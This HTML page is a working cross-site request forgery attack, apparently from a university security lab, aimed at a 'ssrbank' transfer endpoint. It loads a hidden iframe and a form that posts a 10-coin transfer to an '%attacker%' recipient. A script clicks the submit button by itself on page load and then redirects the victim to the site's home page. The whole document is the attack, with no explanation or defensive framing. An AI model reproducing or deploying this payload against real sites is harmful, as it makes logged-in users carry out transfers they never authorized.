<html>
  <head>
  </head>
  <body>
      <iframe name="ssrbank" id="ssrbankFrame" src="http://os.snu.ac.kr/ssrbank/transfer.php" style="visibility:hidden;" width="300px" height="300px">
    </iframe>

      <form target="ssrbank" id="ssrbankForm" action="http://os.snu.ac.kr/ssrbank/transfer.php" method="post" >
          <input name=coins type=text value="10">
          <input name=recipient type=text value="%attacker%">
          <input id="btn" onclick="ssrbankFunc()" type=submit name=submission value="Send">
     </form>

     <script>
         function ssrbankFunc () {
         window.location.href="http://os.snu.ac.kr";
         }
         document.getElementById("btn").click();
     </script>
  </body>
</html>
